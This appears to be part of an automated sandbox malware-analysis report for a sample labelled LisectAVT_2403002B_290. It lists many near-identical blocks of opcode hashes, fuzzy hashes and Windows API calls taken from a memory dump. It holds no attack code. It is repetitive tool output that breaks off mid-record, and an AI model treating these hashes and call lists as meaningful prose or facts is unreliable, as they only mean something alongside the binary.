                                                                                                                                                                                                                          • Instruction ID: 3e28eb3131572d2fac298909779aa96aa2a87ebeacc2675cd42585d1acf75fde
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23d34bf04866c5ae9d00e95c9030021b5f300522d807fc47d3c1f454d20da297
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEE04C716896147AF65117B05C4EFFA352DAB14B01F109420F792E91D0DAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FA97
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FAA7
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FAAF
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FABB
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FACA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
                                                                                                                                                                                                                          • Instruction ID: 1d36f7c1484a4d98f76bcf46e8ebade4d22d25235dcfb774b2c89be6bd50a90d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b3226776a5742b27fbb979d904a7470388a7b538000b63b34d878ba3ff64aa0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3E0EC712886007AF65017B05C0EFFA352CAB14B02F105420F792E90D0CAF85C42473D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F69B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F6AB
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F6B3
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F6BF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F6CE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
                                                                                                                                                                                                                          • Instruction ID: c4bcc1e1c1be38c76109329eba7caa4c6fa0630b5fa9804ec52db424150adb96
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1df19ddf3821a151879fa176db2f2840e5e50782decf33660897cd00c31d8261
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36E042B1289614BAF65117B05C4EFFA362DAB14B02F10A420F792E91D0CAF86C468B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F360
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F370
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F378
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F384
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F393
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
                                                                                                                                                                                                                          • Instruction ID: f7383a7ab23df242e51286724413437d4e223c1a3943708dcd5a078a45c667a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34a7cfb35cefde2ddd2ec6d40638f8d98ca118db87320b005e42d95ebf97a8be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64E042B1288304BAF65117B06C4EFBA362DA714F02F106524F792E91D0CAF96C529B3E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB6F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB7F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB87
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB93
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FBA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
                                                                                                                                                                                                                          • Instruction ID: 4017f48e94712bf2f969ea7e51899ef551f7e2015cd638675003ecdf66d8c9fa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1636c61c8cbb0665695d0440f991a4229b6176894076ef849f9fa76ba953181
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BE04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F773
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F783
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F78B
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F797
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7A6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
                                                                                                                                                                                                                          • Instruction ID: 71a0b32a7878cc80f8160acc97d736f4d43d5bc296ae39aaeaecc328a0f48766
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dc3a8707538aa1bd6e265054b12e56723896eeed88543bbfb4ce09428766a02
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51E04C716897147AF65117B05C4EFFA352DAB14B01F105520F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F318
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F328
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F330
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F33C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F34B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
                                                                                                                                                                                                                          • Instruction ID: 334fcfc35a5dd8afaa864d8e0f73d07486cccace6e0d136221b9713eec3d01bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 145af19c4a3d465d9ff42e3dc6b765607c6eb6348d29c9401d67edf403f9197c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBE042B1289714BAF65117B05C4EFFA362DAB14B02F106420F792E91D0CAF96C428B7E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040FB27
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040FB37
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040FB3F
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040FB4B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040FB5A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
                                                                                                                                                                                                                          • Instruction ID: 0b98619118816d2a2a2b8005e09654c782942d7a3eccd87f9c26c283519b54bc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05e68aaf83bba0886d3b98f546a04423c6a9d44d9e403c0ac7e3a688c7bd9e88
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DE04C712896147AF65117B05C4EFFA352DAB14B02F105420F792E91D0CAF95D424B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F72B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F73B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F743
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F74F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F75E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
                                                                                                                                                                                                                          • Instruction ID: b83773e1df3edd97bc25a0b786c3283d31d19127a53598c0ef36f1eb61ead98d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 431d2f6382f22f1c527d9f63ec14534cbdb325eac1115864a4e71dff3750b3ed
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E04C716896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3F0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F400
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F408
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F414
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F423
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
                                                                                                                                                                                                                          • Instruction ID: 2b10cc25e026ddcf9697d52d97dd030663e87e79539ddb17dd0f1381a82fdc3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ffba4c012e2a4b0f6acf445ca24378fc798d4f7e951ca50223e0f86f292853c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3E04CB1288304BAF65017B05C4EFB6352DA714B01F106520B792E91D1CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F803
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F813
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F81B
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F827
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F836
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
                                                                                                                                                                                                                          • Instruction ID: 262968f47342c6bcf14978d3074c3fef03dfaca683abf3537834e770978e0ce4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4623f1a551e87028d1c37d3bd4b88e87d5139ecf13376460a3b90faf38a880bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87E042B1299614BAF65117B09C4EFFA362DEB14B02F106420F792E91D0CAF86D428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F3A8
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F3B8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F3C0
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F3CC
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F3DB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
                                                                                                                                                                                                                          • Instruction ID: 510ba6cb99a25d9121a1dffcbb3beb8f5a9f0f327987106bb48a6d04e3a7d157
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c962d335c45755fcc61496da2e518791d41e1c3939c3d2040d06c0cb1a6ba80d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E04C712897147EF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F7BB
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F7CB
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F7D3
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F7DF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F7EE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
                                                                                                                                                                                                                          • Instruction ID: fc2c61729b590515bdfd3972ace7de4b77c4262dfd1b686aa39bd5981164a283
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb94d651815346972d6feff6a604d2131db2772f73321fb1a3e3e43d9ff7cf87
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B2D0), ref: 0041172F
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B2D0), ref: 00411784
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(0044A620), ref: 00411868
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?,00000000,00000000,0040EE65), ref: 00411884
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$DeleteEnterExceptionLeaveRaise
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3416413283-0
                                                                                                                                                                                                                          • Opcode ID: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
                                                                                                                                                                                                                          • Instruction ID: 13516defa6da1fa1ea0f36df8edcfa91a04d8b774725dd04c741ba324b34f0a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 974173B5600208EFDB10AF65E884B9777A9FF04314F04816AFD198B361E778ED80CB59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004335DE
                                                                                                                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00433612
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000000,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 00433643
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,0042AC7E,00000001,00000000,00000000,?,?,?,?,0042AC7E,00000000,?), ref: 004336B1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3058430110-0
                                                                                                                                                                                                                          • Opcode ID: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
                                                                                                                                                                                                                          • Instruction ID: 311c7ba4c8e43137f5e4a7efccb9debf39a4ffc4a742db9a7ca4f6796694eb12
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 168a7d6b851788922753df20cd8b2ff507474dd74b81cdd549bdc917c7ae7022
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3631C031604246FFDB20DF64C8869AB7BA0FF09312F1495AAE4618B291DB34DE40DB55
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$String_memcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1108949412-0
                                                                                                                                                                                                                          • Opcode ID: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
                                                                                                                                                                                                                          • Instruction ID: dca89a99140dcdefd2515e70e36f7115f501ce712d998d2b27d11117e8ebcf95
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a72ac23a312537908e60c26b74cd9140573bc26e714fe6a4de8df1950316c01f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95219233305516AFD7209B15FC84FEBF7A8FBD5325F01456BF5048A210D636D89287A4
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,0000000D,00000000,00411A70), ref: 00423DC1
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00423DC8
                                                                                                                                                                                                                            • Part of subcall function 00423CD9: IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00423DEA
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00423E17
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HeapVirtual$AllocAllocateFeatureFreePresentProcessProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2677508003-0
                                                                                                                                                                                                                          • Opcode ID: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
                                                                                                                                                                                                                          • Instruction ID: 33552fc1f294df3a2b2b113b899d939f80dfa8ae59bb1af21b4907c51dd0f451
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77e4cd4afd0e12484e5c990bfcac6811d7f4968818277ea316a279932f6fd003
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83016135304221A7EB311F6ABC09B673676EB85B02F950036F901E62A0CB6CCD41869C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3016257755-0
                                                                                                                                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                          • Instruction ID: 778b9b8891b73742fb5b30d1044a06d15375a4591dad267e5ab082aca22325bf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F11B03250005EFBCF125E86EC11CEE3F26BF18354B888856FE1958131C63AD9B2AB95
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042C356
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042C36D
                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 0042C37B
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 0042C38B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428844396.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_40b000_LisectAVT_2403002B_290.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3521780317-0
                                                                                                                                                                                                                          • Opcode ID: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
                                                                                                                                                                                                                          • Instruction ID: 1f90ef54278d78fe482f5476074c301cb1ab8b2a9e1e54857d71ca385ae67bc9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1571e76f888f1696554205098581bf46176412833ac8a890af7b9e4240ba434f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AF06D32B40720DADB20EBB6B54674E33A0AB00724FD58A5FF800A7291CB6C5802DB5E
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
